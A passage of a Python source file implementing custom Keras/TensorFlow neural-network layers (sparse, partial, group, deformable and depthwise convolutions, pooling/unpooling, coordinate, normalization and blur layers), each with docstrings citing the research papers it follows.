x, m = SparseConv2D(32, 3, padding='same')([x,m])
x = Activation('relu')(x)
# Notes
Sparse Convolution propagates the sparsity of the input data
through the network using a 2D mask.
# References
[Sparsity Invariant CNNs](https://arxiv.org/abs/1708.06500)
"""
def __init__(self, filters, kernel_size,
kernel_initializer=conv_init_relu,
binary=True,
**kwargs):
super(SparseConv2D, self).__init__(kernel_size, kernel_initializer=kernel_initializer, **kwargs)
self.filters = filters
self.binary = binary
def build(self, input_shape):
if type(input_shape) is list:
feature_shape = input_shape[0]
else:
feature_shape = input_shape
self.kernel_shape = (*self.kernel_size, feature_shape[-1], self.filters)
self.kernel = self.add_weight(name='kernel',
shape=self.kernel_shape,
initializer=self.kernel_initializer,
regularizer=self.kernel_regularizer,
constraint=self.kernel_constraint,
trainable=True,
dtype=self.dtype)
self.mask_kernel_shape = (*self.kernel_size, 1, 1)
self.mask_kernel = tf.ones(self.mask_kernel_shape)
self.mask_fan_in = tf.reduce_prod(self.mask_kernel_shape[:3])
if self.use_bias:
self.bias = self.add_weight(name='bias',
shape=(self.filters,),
initializer=self.bias_initializer,
regularizer=self.bias_regularizer,
constraint=self.bias_constraint,
trainable=True,
dtype=self.dtype)
else:
self.bias = None
super(SparseConv2D, self).build(input_shape)
def call(self, inputs, **kwargs):
if type(inputs) is list:
features = inputs[0]
mask = inputs[1]
else:
# if no mask is provided, get it from the features
features = inputs
mask = tf.where(tf.equal(tf.reduce_sum(features, axis=-1, keepdims=True), 0), 0.0, 1.0)
features = tf.multiply(features, mask)
features = nn_ops.convolution(features, self.kernel, self.padding.upper(), self.strides, self.dilation_rate)
norm = nn_ops.convolution(mask, self.mask_kernel, self.padding.upper(), self.strides, self.dilation_rate)
mask_fan_in = tf.cast(self.mask_fan_in, 'float32')
if self.binary:
mask = tf.where(tf.greater(norm,0), 1.0, 0.0)
else:
mask = norm / mask_fan_in
#ratio = tf.where(tf.equal(norm,0), 0.0, 1/norm) # Note: The authors use this in the paper, but it would require special initialization...
ratio = tf.where(tf.equal(norm,0), 0.0, mask_fan_in/norm)
features = tf.multiply(features, ratio)
if self.use_bias:
features = tf.add(features, self.bias)
if self.activation is not None:
features = self.activation(features)
return [features, mask]
def compute_output_shape(self, input_shape):
if type(input_shape) is list:
feature_shape = input_shape[0]
else:
feature_shape = input_shape
space = feature_shape[1:-1]
new_space = []
for i in range(len(space)):
new_dim = conv_utils.conv_output_length(
space[i],
self.kernel_size[i],
padding=self.padding,
stride=self.strides[i],
dilation=self.dilation_rate[i])
new_space.append(new_dim)
feature_shape = [feature_shape[0], *new_space, self.filters]
mask_shape = [*feature_shape[:-1], 1]
return [feature_shape, mask_shape]
def get_config(self):
config = super(SparseConv2D, self).get_config()
config.update({
'filters': self.filters,
'binary': self.binary,
})
return config
class PartialConv2D(Conv2DBaseLayer):
"""2D Partial Convolution layer for sparse input data.
# Arguments
They are the same as for the normal Conv2D layer.
binary: Boolean flag, whether the sparsity is propagated as binary
mask or as float values.
# Input shape
features: 4D tensor with shape (batch_size, rows, cols, channels)
mask: 4D tensor with shape (batch_size, rows, cols, channels)
If the shape is (batch_size, rows, cols, 1), the mask is repeated
for each channel. If no mask is provided, all input elements
unequal to zero are considered as valid.
# Example
x, m = PartialConv2D(32, 3, padding='same')(x)
x = Activation('relu')(x)
x, m = PartialConv2D(32, 3, padding='same')([x,m])
x = Activation('relu')(x)
# Notes
In contrast to Sparse Convolution, Partial Convolution propagates
the sparsity for each channel separately. This makes it possible
to concatenate the features and the masks from different branches
in architecture.
# References
[Image Inpainting for Irregular Holes Using Partial Convolutions](https://arxiv.org/abs/1804.07723)
[Sparsity Invariant CNNs](https://arxiv.org/abs/1708.06500)
"""
def __init__(self, filters, kernel_size,
kernel_initializer=conv_init_relu,
binary=True,
weightnorm=False,
eps=1e-6,
**kwargs):
super(PartialConv2D, self).__init__(kernel_size, kernel_initializer=kernel_initializer, **kwargs)
self.filters = filters
self.binary = binary
self.weightnorm = weightnorm
self.eps = eps
def build(self, input_shape):
if type(input_shape) is list:
feature_shape = input_shape[0]
mask_shape = input_shape[1]
self.mask_shape = mask_shape
else:
feature_shape = input_shape
self.mask_shape = feature_shape
self.kernel_shape = (*self.kernel_size, feature_shape[-1], self.filters)
self.kernel = self.add_weight(name='kernel',
shape=self.kernel_shape,
initializer=self.kernel_initializer,
regularizer=self.kernel_regularizer,
constraint=self.kernel_constraint,
trainable=True,
dtype=self.dtype)
self.mask_kernel_shape = (*self.kernel_size, feature_shape[-1], self.filters)
self.mask_kernel = tf.ones(self.mask_kernel_shape)
self.mask_fan_in = tf.reduce_prod(self.mask_kernel_shape[:3])
if self.weightnorm:
self.wn_g = self.add_weight(name='wn_g',
shape=(self.filters,),
initializer=initializers.Ones(),
trainable=True,
dtype=self.dtype)
if self.use_bias:
self.bias = self.add_weight(name='bias',
shape=(self.filters,),
initializer=self.bias_initializer,
regularizer=self.bias_regularizer,
constraint=self.bias_constraint,
trainable=True,
dtype=self.dtype)
else:
self.bias = None
super(PartialConv2D, self).build(input_shape)
def call(self, inputs, **kwargs):
if type(inputs) is list:
features = inputs[0]
mask = inputs[1]
# if mask has only one channel, repeat
if self.mask_shape[-1] == 1:
mask = tf.repeat(mask, tf.shape(features)[-1], axis=-1)
else:
# if no mask is provided, get it from the features
features = inputs
mask = tf.where(tf.equal(features, 0), 0.0, 1.0)
if self.weightnorm:
norm = tf.sqrt(tf.reduce_sum(tf.square(self.kernel), (0,1,2)) + self.eps)
kernel = self.kernel / norm * self.wn_g
else:
kernel = self.kernel
mask_kernel = self.mask_kernel
features = tf.multiply(features, mask)
features = nn_ops.convolution(features, kernel, self.padding.upper(), self.strides, self.dilation_rate)
norm = nn_ops.convolution(mask, mask_kernel, self.padding.upper(), self.strides, self.dilation_rate)
mask_fan_in = tf.cast(self.mask_fan_in, 'float32')
if self.binary:
mask = tf.where(tf.greater(norm,0), 1.0, 0.0)
else:
mask = norm / mask_fan_in
ratio = tf.where(tf.equal(norm,0), 0.0, mask_fan_in/norm)
features = tf.multiply(features, ratio)
if self.use_bias:
features = tf.add(features, self.bias)
if self.activation is not None:
features = self.activation(features)
return [features, mask]
def compute_output_shape(self, input_shape):
if type(input_shape) is list:
feature_shape = input_shape[0]
else:
feature_shape = input_shape
space = feature_shape[1:-1]
new_space = []
for i in range(len(space)):
new_dim = conv_utils.conv_output_length(
space[i],
self.kernel_size[i],
padding=self.padding,
stride=self.strides[i],
dilation=self.dilation_rate[i])
new_space.append(new_dim)
feature_shape = [feature_shape[0], *new_space, self.filters]
mask_shape = [feature_shape[0], *new_space, self.filters]
return [feature_shape, mask_shape]
def get_config(self):
config = super(PartialConv2D, self).get_config()
config.update({
'filters': self.filters,
'binary': self.binary,
'weightnorm': self.weightnorm,
'eps': self.eps,
})
return config
class GroupConv2D(Conv2DBaseLayer):
"""2D Group Convolution layer that shares weights over symmetries.
Group Convolution provides discrete rotation equivariance. It reduces the number
of parameters and typically lead to better results.
The following two finite groups are supported:
Cyclic Group C4 (p4, 4 rotational symmetries)
Dihedral Group D4 (p4m, 4 rotational and 4 reflection symmetries)
# Arguments
They are the same as for the normal Conv2D layer.
filters: int, The effective number of filters is this value multiplied by the
number of transformations in the group (4 for C4 and 8 for D4)
kernel_size: int, Only odd values are supported
group: 'C4' or 'D4', Stay with one group when stacking layers
# Input shape
featurs: 4D tensor with shape (batch_size, rows, cols, in_channels)
or 5D tensor with shape (batch_size, rows, cols, num_transformations, in_channels)
# Output shape
featurs: 5D tensor with shape (batch_size, rows, cols, num_transformations, out_channels)
# Notes
- BatchNormalization works as expected and shares the statistict over symmetries.
- Spatial Pooling can be done via AvgPool3D.
- Pooling along the group dimension can be done via MaxPool3D.
- Concatenation along the group dimension can be done via Reshape.
- To get a model with the inference time of a normal CNN, you can load the
expanded kernel into a normal Conv2D layer. The kernel expansion is
done in the 'call' method and the expanded kernel is stored in the
'transformed_kernel' attribute.
# Example
x = Input((16,16,3))
x = GroupConv2D(12, 3, group='D4', padding='same', activation='relu')(x)
x = BatchNormalization()(x)
x = GroupConv2D(12, 3, group='D4', padding='same', activation='relu')(x)
x = AvgPool3D(pool_size=(2,2,1), strides=(2,2,1), padding='same')(x)
x = GroupConv2D(12, 3, group='D4', padding='same', activation='relu')(x)
x = MaxPool3D(pool_size=(1,1,x.shape[-2]))(x)
s = x.shape
x = Reshape((s[1],s[2],s[3]*s[4]))(x)
# References
[Group Equivariant Convolutional Networks](https://arxiv.org/abs/1602.07576)
[Rotation Equivariant CNNs for Digital Pathology](https://arxiv.org/abs/1806.03962)
https://github.com/tscohen/GrouPy
https://github.com/basveeling/keras-gcnn
"""
def __init__(self, filters, kernel_size, group='D4', **kwargs):
super(GroupConv2D, self).__init__(kernel_size, **kwargs)
if not self.kernel_size[0] == self.kernel_size[1]:
raise ValueError('Requires square kernel')
if self.kernel_size[0] % 2 != 1:
raise ValueError('Requires odd kernel size')
group = group.upper()
if group == 'C4':
self.num_transformations = 4
elif group == 'D4':
self.num_transformations = 8
else:
raise ValueError('Unknown group')
self.filters = filters
self.group = group
self.input_spec = InputSpec(min_ndim=4, max_ndim=5)
def compute_output_shape(self, input_shape):
space = input_shape[1:3]
new_space = []
for i in range(len(space)):
new_dim = conv_utils.conv_output_length(
space[i],
self.kernel_size[i],
padding=self.padding,
stride=self.strides[i],
dilation=self.dilation_rate[i])
new_space.append(new_dim)
return (input_shape[0], *new_space, self.num_transformations, self.filters)
def build(self, input_shape):
if len(input_shape) == 4:
self.first = True
num_in_channels = input_shape[-1]
else:
self.first = False
num_in_channels = input_shape[-2] * input_shape[-1]
self.kernel = self.add_weight(name='kernel',
shape=(*self.kernel_size, num_in_channels, self.filters),
initializer=self.kernel_initializer,
regularizer=self.kernel_regularizer,
constraint=self.kernel_constraint,
trainable=True,
dtype=self.dtype)
if self.use_bias:
self.bias = self.add_weight(name='bias',
shape=(self.filters,),
initializer=self.bias_initializer,
regularizer=self.bias_regularizer,
constraint=self.bias_constraint,
trainable=True,
dtype=self.dtype)
else:
self.bias = None
self.built = True
def call(self, features):
ni = features.shape[-1]
no = self.filters
if self.group == 'C4':
nt = 4
elif self.group == 'D4':
nt = 8
nti = 1 if self.first else nt
nto = nt
k = self.kernel_size[0]
t = np.reshape(np.arange(nti*k*k), (nti,k,k))
trafos = [np.rot90(t,k,axes=(1, 2)) for k in range(4)]
if nt == 8:
trafos = trafos + [np.flip(t,1) for t in trafos]
self.trafos = trafos = np.array(trafos)
# index magic happens here
if nti == 1:
indices = trafos
elif nti == 4:
indices = [[trafos[l, (m-l)%4 ,:,:] for m in range(4)] for l in range(4)]
elif nti == 8:
indices = [[trafos[l, (m-l)%4 if ((m < 4) == (l < 4)) else (m+l)%4+4 ,:,:] for m in range(8)] for l in range(8)]
self.indices = indices = np.reshape(indices, (nto,nti,k,k))
# transform the kernel
kernel = self.kernel
kernel = tf.reshape(kernel, (nti*k*k, ni, no))
kernel = tf.gather(kernel, indices, axis=0)
kernel = tf.reshape(kernel, (nto, nti, k,k, ni, no))
kernel = tf.transpose(kernel, (2,3,1,4,0,5))
kernel = tf.reshape(kernel, (k,k, nti*ni, nto*no))
self.transformed_kernel = kernel
if self.first:
x = features
else:
s = features.shape
x = tf.reshape(features, (-1,s[1],s[2],s[3]*s[4]))
x = K.conv2d(x, kernel, strides=self.strides, padding=self.padding, dilation_rate=self.dilation_rate)
s = x.shape
x = tf.reshape(x, (-1,s[1],s[2],nto,no))
features = x
if self.use_bias:
features = tf.add(features, self.bias)
if self.activation is not None:
features = self.activation(features)
return features
def get_config(self):
config = super(GroupConv2D, self).get_config()
config.update({
'filters': self.filters,
'group': self.group,
})
return config
class DeformableConv2D(Conv2DBaseLayer):
"""2D Deformable Convolution layer that learns the spatial offsets where
the input elements of the convolution are sampled.
The layer is basically a updated version of An Jiaoyang's code.
# Notes
- A layer does not use a native CUDA kernel which would have better
performance https://github.com/tensorflow/addons/issues/179
# References
[Deformable Convolutional Networks](https://arxiv.org/abs/1703.06211)
# related code
https://github.com/DHZS/tf-deformable-conv-layer (An Jiaoyang, 2018-10-11)
"""
def __init__(self, filters, kernel_size, num_deformable_group=None, **kwargs):
"""`kernel_size`, `strides` and `dilation_rate` must have the same value in both axis.
:param num_deformable_group: split output channels into groups, offset shared in each group. If
this parameter is None, then set num_deformable_group=filters.
"""
super(DeformableConv2D, self).__init__(kernel_size, **kwargs)
if not self.kernel_size[0] == self.kernel_size[1]:
raise ValueError('Requires square kernel')
if not self.strides[0] == self.strides[1]:
raise ValueError('Requires equal stride')
if not self.dilation_rate[0] == self.dilation_rate[1]:
raise ValueError('Requires equal dilation')
self.filters = filters
if num_deformable_group is None:
num_deformable_group = filters
if filters % num_deformable_group != 0:
raise ValueError('"filters" mod "num_deformable_group" must be zero')
self.num_deformable_group = num_deformable_group
self.kernel = None
self.bias = None
self.offset_layer_kernel = None
self.offset_layer_bias = None
def build(self, input_shape):
input_dim = input_shape[-1]
# kernel_shape = self.kernel_size + (input_dim, self.filters)
# we want to use depth-wise conv
kernel_shape = self.kernel_size + (self.filters * input_dim, 1)
self.kernel = self.add_weight(name='kernel',
shape=kernel_shape,
initializer=self.kernel_initializer,
regularizer=self.kernel_regularizer,
constraint=self.kernel_constraint,
trainable=True,
dtype=self.dtype)
if self.use_bias:
self.bias = self.add_weight(name='bias',
shape=(self.filters,),
initializer=self.bias_initializer,
regularizer=self.bias_regularizer,
constraint=self.bias_constraint,
trainable=True,
dtype=self.dtype)
# create offset conv layer
offset_num = self.kernel_size[0] * self.kernel_size[1] * self.num_deformable_group
self.offset_layer_kernel = self.add_weight(name='offset_layer_kernel',
shape=self.kernel_size + (input_dim, offset_num * 2), # 2 means x and y axis
initializer=tf.zeros_initializer(),
regularizer=self.kernel_regularizer,
trainable=True,
dtype=self.dtype)
self.offset_layer_bias = self.add_weight(name='offset_layer_bias',
shape=(offset_num * 2,),
initializer=tf.zeros_initializer(),
# initializer=tf.random_uniform_initializer(-5, 5),
regularizer=self.bias_regularizer,
trainable=True,
dtype=self.dtype)
self.built = True
def call(self, inputs, training=None, **kwargs):
# get offset, shape [batch_size, out_h, out_w, filter_h, * filter_w * channel_out * 2]
offset = tf.nn.conv2d(inputs,
filters=self.offset_layer_kernel,
strides=[1, *self.strides, 1],
padding=self.padding.upper(),
dilations=[1, *self.dilation_rate, 1])
offset += self.offset_layer_bias
# add padding if needed
inputs = self._pad_input(inputs)
# some length
batch_size = tf.shape(inputs)[0]
channel_in = int(inputs.shape[-1])
in_h, in_w = [int(i) for i in inputs.shape[1: 3]] # input feature map size
out_h, out_w = [int(i) for i in offset.shape[1: 3]] # output feature map size
filter_h, filter_w = self.kernel_size
# get x, y axis offset
offset = tf.reshape(offset, [batch_size, out_h, out_w, -1, 2])
y_off, x_off = offset[:, :, :, :, 0], offset[:, :, :, :, 1]
# input feature map gird coordinates
y, x = self._get_conv_indices([in_h, in_w])
y, x = [tf.expand_dims(i, axis=-1) for i in [y, x]]
y, x = [tf.tile(i, [batch_size, 1, 1, 1, self.num_deformable_group]) for i in [y, x]]
y, x = [tf.reshape(i, [batch_size, *i.shape[1: 3], -1]) for i in [y, x]]
y, x = [tf.cast(i, 'float32') for i in [y, x]]
# add offset
y, x = y + y_off, x + x_off
y = tf.clip_by_value(y, 0, in_h - 1)
x = tf.clip_by_value(x, 0, in_w - 1)
# get four coordinates of points around (x, y)
y0, x0 = [tf.cast(tf.floor(i), 'int32') for i in [y, x]]
y1, x1 = y0 + 1, x0 + 1
# clip
y0, y1 = [tf.clip_by_value(i, 0, in_h - 1) for i in [y0, y1]]
x0, x1 = [tf.clip_by_value(i, 0, in_w - 1) for i in [x0, x1]]
# get pixel values
indices = [[y0, x0], [y0, x1], [y1, x0], [y1, x1]]
p0, p1, p2, p3 = [DeformableConv2D._get_pixel_values_at_point(inputs, i) for i in indices]
# cast to float
x0, x1, y0, y1 = [tf.cast(i, 'float32') for i in [x0, x1, y0, y1]]
# weights
w0 = (y1 - y) * (x1 - x)
w1 = (y1 - y) * (x - x0)
w2 = (y - y0) * (x1 - x)
w3 = (y - y0) * (x - x0)
# expand dim for broadcast
w0, w1, w2, w3 = [tf.expand_dims(i, axis=-1) for i in [w0, w1, w2, w3]]
# bilinear interpolation
pixels = tf.add_n([w0 * p0, w1 * p1, w2 * p2, w3 * p3])
# reshape the "big" feature map
pixels = tf.reshape(pixels, [batch_size, out_h, out_w, filter_h, filter_w, self.num_deformable_group, channel_in])
pixels = tf.transpose(pixels, [0, 1, 3, 2, 4, 5, 6])
pixels = tf.reshape(pixels, [batch_size, out_h * filter_h, out_w * filter_w, self.num_deformable_group, channel_in])
# copy channels to same group
feat_in_group = self.filters // self.num_deformable_group
pixels = tf.tile(pixels, [1, 1, 1, 1, feat_in_group])
pixels = tf.reshape(pixels, [batch_size, out_h * filter_h, out_w * filter_w, -1])
# depth-wise conv
out = tf.nn.depthwise_conv2d(pixels, self.kernel, [1, filter_h, filter_w, 1], 'VALID')
# add the output feature maps in the same group
out = tf.reshape(out, [batch_size, out_h, out_w, self.filters, channel_in])
out = tf.reduce_sum(out, axis=-1)
if self.use_bias:
out += self.bias
return self.activation(out)
def _pad_input(self, inputs):
"""Check if input feature map needs padding, because we don't use the standard Conv() function.
:param inputs:
:return: padded input feature map
"""
# When padding is 'same', we should pad the feature map.
# if padding == 'same', output size should be `ceil(input / stride)`
if self.padding == 'same':
in_shape = inputs.shape.as_list()[1:3]
padding_list = []
for i in range(2):
filter_size = self.kernel_size[i]
dilation = self.dilation_rate[i]
dilated_filter_size = filter_size + (filter_size - 1) * (dilation - 1)
same_output = (in_shape[i] + self.strides[i] - 1) // self.strides[i]
valid_output = (in_shape[i] - dilated_filter_size + self.strides[i]) // self.strides[i]
if same_output == valid_output:
padding_list += [0, 0]
else:
p = dilated_filter_size - 1
p_0 = p // 2
padding_list += [p_0, p - p_0]
if sum(padding_list) != 0:
padding = [[0, 0],
[padding_list[0], padding_list[1]], # top, bottom padding
[padding_list[2], padding_list[3]], # left, right padding
[0, 0]]
inputs = tf.pad(inputs, padding)
return inputs
def _get_conv_indices(self, feature_map_size):
"""the x, y coordinates in the window when a filter sliding on the feature map
:param feature_map_size:
:return: y, x with shape [1, out_h, out_w, filter_h * filter_w]
"""
feat_h, feat_w = [int(i) for i in feature_map_size[0: 2]]
x, y = tf.meshgrid(tf.range(feat_w), tf.range(feat_h))
x, y = [tf.reshape(i, [1, *i.get_shape(), 1]) for i in [x, y]] # shape [1, h, w, 1]
x, y = [tf.image.extract_patches(i,
[1, *self.kernel_size, 1],
[1, *self.strides, 1],
[1, *self.dilation_rate, 1],
'VALID')
for i in [x, y]] # shape [1, out_h, out_w, filter_h * filter_w]
return y, x
@staticmethod
def _get_pixel_values_at_point(inputs, indices):
"""get pixel values
:param inputs:
:param indices: shape [batch_size, H, W, I], I = filter_h * filter_w * channel_out
:return:
"""
y, x = indices
batch, h, w, n = y.shape.as_list()[0: 4]
y_shape = tf.shape(y)
batch, n = y_shape[0], y_shape[3]
batch_idx = tf.reshape(tf.range(0, batch), (batch, 1, 1, 1))
b = tf.tile(batch_idx, (1, h, w, n))
pixel_idx = tf.stack([b, y, x], axis=-1)
return tf.gather_nd(inputs, pixel_idx)
class DepthwiseConv2D(Conv2DBaseLayer):
"""2D depthwise convolution layer.
# Notes
A DepthwiseConv2D layer followed by an 1x1 Conv2D layer is equivalent
to the SeparableConv2D layer provided by Keras.
# References
[Xception: Deep Learning with Depthwise Separable Convolutions](http://arxiv.org/abs/1610.02357)
"""
def __init__(self, depth_multiplier, kernel_size,
kernel_initializer=depthwiseconv_init_relu,
**kwargs):
super(DepthwiseConv2D, self).__init__(kernel_size, kernel_initializer=kernel_initializer, **kwargs)
self.depth_multiplier = depth_multiplier
def build(self, input_shape):
if type(input_shape) is list:
feature_shape = input_shape[0]
else:
feature_shape = input_shape
kernel_shape = (*self.kernel_size, feature_shape[-1], self.depth_multiplier)
self.kernel = self.add_weight(name='kernel',
shape=kernel_shape,
initializer=self.kernel_initializer,
regularizer=self.kernel_regularizer,
constraint=self.kernel_constraint,
trainable=True,
dtype=self.dtype)
if self.use_bias:
self.bias = self.add_weight(name='bias',
shape=(feature_shape[-1]*self.depth_multiplier,),
initializer=self.bias_initializer,
regularizer=self.bias_regularizer,
constraint=self.bias_constraint,
trainable=True,
dtype=self.dtype)
else:
self.bias = None
super(DepthwiseConv2D, self).build(input_shape)
def call(self, inputs, **kwargs):
if type(inputs) is list:
features = inputs[0]
else:
features = inputs
features = K.depthwise_conv2d(features, self.kernel,
strides=self.strides,
padding=self.padding,
dilation_rate=self.dilation_rate)
if self.use_bias:
features = tf.add(features, self.bias)
if self.activation is not None:
features = self.activation(features)
return features
def compute_output_shape(self, input_shape):
if type(input_shape) is list:
feature_shape = input_shape[0]
else:
feature_shape = input_shape
space = feature_shape[1:-1]
new_space = []
for i in range(len(space)):
new_dim = conv_utils.conv_output_length(
space[i],
self.kernel_size[i],
padding=self.padding,
stride=self.strides[i],
dilation=self.dilation_rate[i])
new_space.append(new_dim)
feature_shape = [feature_shape[0], *new_space, feature_shape[-1]*self.depth_multiplier]
return feature_shape
def get_config(self):
config = super(DepthwiseConv2D, self).get_config()
config.update({
'depth_multiplier': self.depth_multiplier,
})
return config
class MaxPoolingWithArgmax2D(Layer):
'''MaxPooling for unpooling with indices.
# References
[SegNet: A Deep Convolutional Encoder-Decoder Architecture for Image Segmentation](http://arxiv.org/abs/1511.00561)
# related code:
https://github.com/PavlosMelissinos/enet-keras
https://github.com/ykamikawa/SegNet
'''
def __init__(self, pool_size=(2, 2), strides=(2, 2), padding='same', **kwargs):
super(MaxPoolingWithArgmax2D, self).__init__(**kwargs)
self.pool_size = conv_utils.normalize_tuple(pool_size, 2, 'pool_size')
self.strides = conv_utils.normalize_tuple(strides, 2, 'strides')
self.padding = conv_utils.normalize_padding(padding)
def call(self, inputs, **kwargs):
ksize = [1, self.pool_size[0], self.pool_size[1], 1]
strides = [1, self.strides[0], self.strides[1], 1]
padding = self.padding.upper()
output, argmax = nn_ops.max_pool_with_argmax(inputs, ksize, strides, padding)
argmax = tf.cast(argmax, K.floatx())
return [output, argmax]
def compute_output_shape(self, input_shape):
ratio = (1, 2, 2, 1)
output_shape = [dim // ratio[idx] if dim is not None else None for idx, dim in enumerate(input_shape)]
output_shape = tuple(output_shape)
return [output_shape, output_shape]
def compute_mask(self, inputs, mask=None):
return 2 * [None]
def get_config(self):
config = super(MaxPoolingWithArgmax2D, self).get_config()
config.update({
'pool_size': self.pool_size,
'strides': self.strides,
'padding': self.padding,
})
return config
class MaxUnpooling2D(Layer):
'''Inversion of MaxPooling with indices.
# References
[SegNet: A Deep Convolutional Encoder-Decoder Architecture for Image Segmentation](http://arxiv.org/abs/1511.00561)
# related code:
https://github.com/PavlosMelissinos/enet-keras
https://github.com/ykamikawa/SegNet
'''
def __init__(self, size=(2, 2), **kwargs):
super(MaxUnpooling2D, self).__init__(**kwargs)
self.size = conv_utils.normalize_tuple(size, 2, 'size')
def call(self, inputs, output_shape=None):
updates, mask = inputs[0], inputs[1]
mask = tf.cast(mask, 'int32')
input_shape = tf.shape(updates, out_type='int32')
# calculation new shape
if output_shape is None:
output_shape = (input_shape[0], input_shape[1] * self.size[0], input_shape[2] * self.size[1], input_shape[3])
# calculation indices for batch, height, width and feature maps
one_like_mask = K.ones_like(mask, dtype='int32')
batch_shape = K.concatenate([[input_shape[0]], [1], [1], [1]], axis=0)
batch_range = K.reshape(tf.range(output_shape[0], dtype='int32'), shape=batch_shape)
b = one_like_mask * batch_range
y = mask // (output_shape[2] * output_shape[3])
x = (mask // output_shape[3]) % output_shape[2]
feature_range = tf.range(output_shape[3], dtype='int32')
f = one_like_mask * feature_range
# transpose indices & reshape update values to one dimension
updates_size = tf.size(updates)
indices = K.transpose(K.reshape(K.stack([b, y, x, f]), [4, updates_size]))
values = K.reshape(updates, [updates_size])
ret = tf.scatter_nd(indices, values, output_shape)
return ret
def compute_output_shape(self, input_shape):
mask_shape = input_shape[1]
output_shape = [mask_shape[0], mask_shape[1] * self.size[0], mask_shape[2] * self.size[1], mask_shape[3]]
return tuple(output_shape)
def get_config(self):
config = super(MaxUnpooling2D, self).get_config()
config.update({
'size': self.size,
})
return config
class AddCoords2D(Layer):
"""Add coords to a tensor as described in CoordConv paper.
# Arguments
with_r: Boolean flag, whether the r coordinate is added or not. See paper for more details.
# Input shape
featurs: 4D tensor with shape (batch_size, rows, cols, channels)
# Output shape
featurs: same as input except channels + 2, channels + 3 if with_r is True
# Example
x = Conv2D(32, 3, padding='same', activation='relu')(x)
x = AddCoords2D()(x)
x = Conv2D(32, 3, padding='same', activation='relu')(x)
# Notes
Semi-convolutional Operators is an approach that is closely related to CoordConv.
# References
[An Intriguing Failing of Convolutional Neural Networks and the CoordConv Solution](http://arxiv.org/abs/1807.03247)
[Semi-convolutional Operators for Instance Segmentation](https://arxiv.org/abs/1807.10712)
"""
def __init__(self, with_r=False, **kwargs):
super(AddCoords2D, self).__init__(**kwargs)
self.with_r = with_r
def call(self, features):
y_dim = features.shape[1]
x_dim = features.shape[2]
ones = tf.ones_like(features[:,:,:,:1])
y_range = tf.range(y_dim, dtype='float32') / tf.cast(y_dim-1, 'float32') * 2 - 1
x_range = tf.range(x_dim, dtype='float32') / tf.cast(x_dim-1, 'float32') * 2 - 1
yy = ones * y_range[None, :, None, None]
xx = ones * x_range[None, None, :, None]
if self.with_r:
rr = tf.sqrt(tf.square(yy-0.5) + tf.square(xx-0.5))
features = tf.concat([features, yy, xx, rr], axis=-1)
else:
features = tf.concat([features, yy, xx], axis=-1)
return features
def compute_output_shape(self, input_shape):
output_shape = list(input_shape)
output_shape[3] = output_shape[3] + 2
if self.with_r:
output_shape[3] = output_shape[3] + 1
return tuple(output_shape)
def get_config(self):
config = super(AddCoords2D, self).get_config()
config.update({
'with_r': self.with_r,
})
return config
class LayerNormalization(Layer):
"""Layer Normalization Layer.
# References
[Layer Normalization](http://arxiv.org/abs/1607.06450)
"""
def __init__(self, eps=1e-6, **kwargs):
super(LayerNormalization, self).__init__(**kwargs)
self.eps = eps
def build(self, input_shape):
self.gamma = self.add_weight(name='gamma', shape=input_shape[-1:],
initializer=initializers.Ones(), trainable=True)
self.beta = self.add_weight(name='beta', shape=input_shape[-1:],
initializer=initializers.Zeros(), trainable=True)
super(LayerNormalization, self).build(input_shape)
def call(self, x):
mean = tf.stop_gradient(K.mean(x, axis=-1, keepdims=True))
std = tf.stop_gradient(K.std(x, axis=-1, keepdims=True))
return self.gamma * (x - mean) / (std + self.eps) + self.beta
def compute_output_shape(self, input_shape):
return input_shape
def get_config(self):
config = super(LayerNormalization, self).get_config()
config.update({
'eps': self.eps,
})
return config
class InstanceNormalization(Layer):
"""Instance Normalization Layer.
# References
[Instance Normalization: The Missing Ingredient for Fast Stylization](https://arxiv.org/abs/1607.08022)
"""
def __init__(self, eps=1e-6, **kwargs):
super(InstanceNormalization, self).__init__(**kwargs)
self.eps = eps
def build(self, input_shape):
self.gamma = self.add_weight(name='gamma', shape=input_shape[-1:],
initializer=initializers.Ones(), trainable=True)
self.beta = self.add_weight(name='beta', shape=input_shape[-1:],
initializer=initializers.Zeros(), trainable=True)
super(InstanceNormalization, self).build(input_shape)
def call(self, x):
axis = list(range(len(x.shape))[1:-1])
mean = tf.stop_gradient(K.mean(x, axis=axis, keepdims=True))
std = tf.stop_gradient(K.std(x, axis=axis, keepdims=True))
return self.gamma * (x - mean) / (std + self.eps) + self.beta
def compute_output_shape(self, input_shape):
return input_shape
def get_config(self):
config = super(InstanceNormalization, self).get_config()
config.update({
'eps': self.eps,
})
return config
def Resize2D(size, method='bilinear'):
"""Spatial resizing layer.
# Arguments
size: spatial output size (rows, cols)
method: 'bilinear', 'bicubic', 'nearest', ...
"""
return Lambda(lambda x: tf.image.resize(x, size, method=method))
class Blur2D(Layer):
"""2D Blur Layer as used in Antialiased CNNs for Subsampling.
# Notes
The layer handles boundary effects similar to AvgPool2D.
# References
[Making Convolutional Networks Shift-Invariant Again](https://arxiv.org/abs/1904.11486)
# related code
https://github.com/adobe/antialiased-cnns
https://github.com/adobe/antialiased-cnns/issues/10
"""
def __init__(self, filter_size=3, strides=2, padding='valid', **kwargs):
rank = 2
self.filter_size = filter_size
self.strides = conv_utils.normalize_tuple(strides, rank, 'strides')
self.padding = conv_utils.normalize_padding(padding)
if self.filter_size == 1:
self.a = np.array([1.,])
elif self.filter_size == 2:
self.a = np.array([1., 1.])
elif self.filter_size == 3:
self.a = np.array([1., 2., 1.])
elif self.filter_size == 4:
self.a = np.array([1., 3., 3., 1.])
elif self.filter_size == 5:
self.a = np.array([1., 4., 6., 4., 1.])
elif self.filter_size == 6:
self.a = np.array([1., 5., 10., 10., 5., 1.])
elif self.filter_size == 7:
self.a = np.array([1., 6., 15., 20., 15., 6., 1.])
super(Blur2D, self).__init__(**kwargs)
def compute_output_shape(self, input_shape):
feature_shape = input_shape
space = feature_shape[1:-1]
new_space = []
for i in range(len(space)):
new_dim = conv_utils.conv_output_length(
space[i],
self.kernel_size[i],
padding=self.padding,
stride=self.strides[i],
dilation=self.dilation_rate[i])
new_space.append(new_dim)
feature_shape = [feature_shape[0], *new_space, feature_shape[3]]
return feature_shape
def build(self, input_shape):
k = self.a[:,None] * self.a[None,:]
k = np.tile(k[:,:,None,None], (1,1,input_shape[-1],1))
self.kernel = K.constant(k, dtype=K.floatx())
def call(self, x):
features = K.depthwise_conv2d(x, self.kernel, strides=self.strides, padding=self.padding)
# normalize the features
mask = tf.ones_like(x)
norm = K.depthwise_conv2d(mask, self.kernel, strides=self.strides, padding=self.padding)
features = tf.multiply(features, 1./norm)
return features
def get_config(self):
